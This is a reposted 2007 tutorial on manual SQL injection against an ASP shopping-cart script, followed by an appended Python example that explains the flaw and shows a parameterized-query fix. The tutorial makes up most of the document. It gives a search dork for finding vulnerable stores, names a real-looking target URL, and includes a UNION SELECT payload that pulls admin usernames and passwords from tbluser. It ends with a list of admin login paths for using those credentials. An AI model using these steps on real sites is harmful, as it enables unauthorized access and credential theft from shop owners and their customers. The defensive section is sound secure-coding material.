A foreign article on manual injection
Author: Anonymous    Source: 安全在线    Updated: 2007-10-5 21:21:22

PS: A foreign article on manual injection, fairly basic. Anyone who reads English should find it easy to follow.

Quoted content
BEGIN
First go to google.com and put this
inurl:/shopdisplayproducts.asp
Ok, now we find some site with shopdisplayproducts.asp
Let see some site
http://www.globalasp.org.uk/store/s...ducts.asp?id=14
ok ... now we put on end of link this sign '
now link look like this
http://www.globalasp.org.uk/store/shopdisp....asp?id=14'
And we get ERROR

Products
Mcft JET Database Engine error '80040e14'

Syntax error in string in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14' and hide=0 order by specialoffer desc,cname'.

/store/shop$db.asp, line 467

If we see this error then is HACKABLE ) !!!
Ok ... now we removed '
http://www.globalasp.org.uk/store/s...ducts.asp?id=14
and on this add this

%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20tbluser'

Link now is

http://www.globalasp.org.uk/store/shopdisp...%20tbluser'

And put it in the browser we get the same error !!!

Ok ... now you see this numbers ...

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50

Now we removed ,50

and we now test

http://www.globalasp.org.uk/store/shopdisp...%20tbluser'

The same error and now we removed and removed number, and when we don't see this error we must see some site, on this server correct number for exploit is -> 47 <-

http://www.globalasp.org.uk/store/shopdisp...%20tbluser' ---> THIS YOU SEE 47 is the END NUMBER

Ok now we put this in browser and don't see ERROR we see some LAPTOPs

Ok ... now we find on that site numbers 3 and 4
They are small

When we find that numbers we put where are 3 and 4 in link this code line
fldusername,fldpassword

Now exploitable link is this

http://www.globalasp.org.uk/store/shopdisp...%20tbluser'

and look where was 3 and 4 number now there are username and password for
login in SHOPADMIN , now we are going to this link

http://www.globalasp.org.uk/store/colours$config.asp

there is LOGIN for shopadmin and we login !!!

THIS ARE PATH Where CAN BE SHOPADMINs TOO

shopadmin.asp ----> THIS or ... WITH 1
shopadmin1.asp ----> THIS IS IN 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
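
The root cause behind the error quoted above, from the defender's side. This is an added example, not part of the quoted article or of the shop software: the syntax error appears because the id value is concatenated into the SQL text, and the sketch contrasts that with integer validation plus a bound parameter. Assumptions: Python with an in-memory SQLite database stands in for ASP/Jet, and the schema, rows and function names are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in schema (assumption): SQLite instead of ASP/Jet;
    # column names echo the page's error text, rows are invented.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (catalogid INTEGER, cname TEXT,
                               intcategoryid INTEGER, hide INTEGER);
        CREATE TABLE tbluser (fldusername TEXT, fldpassword TEXT);
        INSERT INTO products VALUES (1, 'Laptop A', 14, 0),
                                    (2, 'Laptop B', 14, 0),
                                    (3, 'Desk', 7, 0);
        INSERT INTO tbluser VALUES ('admin', 'constructed-secret');
    """)
    return db

def list_products_vulnerable(db, raw_id):
    # "Before": the request value is pasted into the SQL text, so the
    # database parses it as SQL. A stray quote then breaks the statement,
    # which is the syntax error the page shows.
    sql = ("SELECT catalogid, cname FROM products WHERE intcategoryid = "
           + raw_id + " AND hide = 0 ORDER BY cname")
    return db.execute(sql).fetchall()

def list_products_hardened(db, raw_id):
    # "After": accept only a short run of ASCII digits, then bind the value
    # as a parameter so it can never change the statement's structure.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be an integer")
    sql = ("SELECT catalogid, cname FROM products "
           "WHERE intcategoryid = ? AND hide = 0 ORDER BY cname")
    return db.execute(sql, (int(raw_id),)).fetchall()

def handle_request(db, raw_id):
    # Return a generic 400 instead of echoing engine errors to the client.
    try:
        return 200, list_products_hardened(db, raw_id)
    except ValueError:
        return 400, []

if __name__ == "__main__":
    db = make_db()
    for value in ("14", "14'", "14 union select 1,2 from tbluser"):
        print(repr(value), handle_request(db, value))
```

The same two measures apply in the original stack: convert the id to an integer before use and pass it through a parameterized command, and turn off detailed database error pages so the query text is not shown to visitors.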

Entered by: ls1238    Editor: ls1238